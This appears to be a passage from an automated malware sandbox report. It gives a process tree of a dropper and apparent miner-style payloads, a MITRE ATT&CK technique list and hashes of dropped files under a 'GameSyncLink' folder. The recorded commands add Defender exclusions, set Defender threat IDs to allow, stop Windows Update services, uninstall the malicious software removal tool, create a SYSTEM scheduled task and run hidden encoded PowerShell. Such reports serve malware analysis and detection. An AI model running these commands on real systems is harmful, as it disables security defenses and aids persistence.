                                                                                                                                                                                                                                              C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:2336
                                                                                                                                                                                                                                                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                  PID:4248
                                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4748
                                                                                                                                                                                                                                                    • C:\Windows\system32\wusa.exe
                                                                                                                                                                                                                                                      wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:2308
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:1908
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:5752
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:4968
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:3688
                                                                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      PID:5468
                                                                                                                                                                                                                                                    • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5980
                                                                                                                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:6052
                                                                                                                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2492
                                                                                                                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:5976
                                                                                                                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:3392
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                explorer.exe
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:1100
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:2508
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe it /WDididAMUT 385118 /S
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:5096
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:3296
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:5728
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:5448
                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:1304
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:5980
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                      PID:5572
                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:4120
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:1384
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:5920
                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:5908
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:2456
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:2520
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:5440
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:5912
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                      PID:5140
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 08:17:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\zfLMDea.exe\" GH /nYwTdidQM 385118 /S" /V1 /F
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                      PID:4036
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                      schtasks /run /I /tn "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                        PID:436
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                      PID:2856
                                                                                                                                                                                                                                                                                                    • C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\zfLMDea.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\zfLMDea.exe GH /nYwTdidQM 385118 /S
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:3824
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5844
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:6056

                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                                          Command and Scripting Interpreter

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1059

                                                                                                                                                                                                                                                                                                          PowerShell

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1059.001

                                                                                                                                                                                                                                                                                                          System Services

                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                          T1569

                                                                                                                                                                                                                                                                                                          Service Execution

                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                          T1569.002

                                                                                                                                                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                                          Create or Modify System Process

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1543

                                                                                                                                                                                                                                                                                                          Windows Service

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1543.003

                                                                                                                                                                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1547

                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1547.001

                                                                                                                                                                                                                                                                                                          Pre-OS Boot

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1542

                                                                                                                                                                                                                                                                                                          Bootkit

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1542.003

                                                                                                                                                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                                          Create or Modify System Process

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1543

                                                                                                                                                                                                                                                                                                          Windows Service

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1543.003

                                                                                                                                                                                                                                                                                                          Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1548

                                                                                                                                                                                                                                                                                                          Bypass User Account Control

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1548.002

                                                                                                                                                                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1547

                                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1547.001

                                                                                                                                                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                                          Abuse Elevation Control Mechanism

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1548

                                                                                                                                                                                                                                                                                                          Bypass User Account Control

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1548.002

                                                                                                                                                                                                                                                                                                          Impair Defenses

                                                                                                                                                                                                                                                                                                          4
                                                                                                                                                                                                                                                                                                          T1562

                                                                                                                                                                                                                                                                                                          Disable or Modify Tools

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1562.001

                                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                                          Pre-OS Boot

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1542

                                                                                                                                                                                                                                                                                                          Bootkit

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1542.003

                                                                                                                                                                                                                                                                                                          Subvert Trust Controls

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1553

                                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1553.004

                                                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                                                          Unsecured Credentials

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1552

                                                                                                                                                                                                                                                                                                          Credentials In Files

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1552.001

                                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                                          7
                                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                          2
                                                                                                                                                                                                                                                                                                          T1497

                                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                                                          Impact

                                                                                                                                                                                                                                                                                                          Service Stop

                                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                                          T1489

                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            288KB

                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                            d9ec6f3a3b2ac7cd5eef07bd86e3efbc

                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                            e1908caab6f938404af85a7df0f80f877a4d9ee6

                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                            472232ca821b5c2ef562ab07f53638bc2cc82eae84cea13fbe674d6022b6481c

                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                            1b6b8702dca3cb90fe64c4e48f2477045900c5e71dd96b84f673478bab1089febfa186bfc55aebd721ca73db1669145280ebb4e1862d3b9dc21f712cd76a07c4

                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            2.5MB

                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                            e6943a08bb91fc3086394c7314be367d

                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                            451d2e171f906fa6c43f8b901cd41b0283d1fa40

                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                            aafdcfe5386452f4924cfcc23f2cf7eccf3f868947ad7291a77b2eca2af0c873

                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                            505d3c76988882602f06398e747c4e496ecad9df1b7959069b87c8111c4d9118484f4d6baef5f671466a184c8caec362d635da210fa0987ccb746cbeea218d2a

                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            6.2MB

                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                            1bacbebf6b237c75dbe5610d2d9e1812

                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                            3ca5768a9cf04a2c8e157d91d4a1b118668f5cf1

                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                            c3747b167c70fd52b16fb93a4f815e7a4ee27cf67d2c7d55ea9d1edc7969c67d

                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                            f6438eced6915890d5d15d853c3ad6856de949b7354dcea97b1cf40d0c8aed767c8e45730e64ab0368f3606da5e95fd1d4db9cc21e613d517f37ddebbd0fa1fe

                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            13.2MB

                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                            72b396a9053dff4d804e07ee1597d5e3

                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                            5ec4fefa66771613433c17c11545c6161e1552d5

                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                            d0b206f0f47a9f8593b6434dc27dadde8480a902e878882fa8c73fc7fe01b11d

                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                            ad96c9ca2feae7af7fcf01a843d5aa6cbdde0520d68dedff44554a17639c6c66b2301d73daf272708cb76c22eae2d5c89db23af45105c4f0e35f4787f98e192b

                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameSyncLink\installc.bat
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            301B

                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                            998ab24316795f67c26aca0f1b38c8ce

                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                            a2a6dc94e08c086fe27f8c08cb8178e7a64f200d

                                                                                                                                                                                                                                                                                                            SHA256

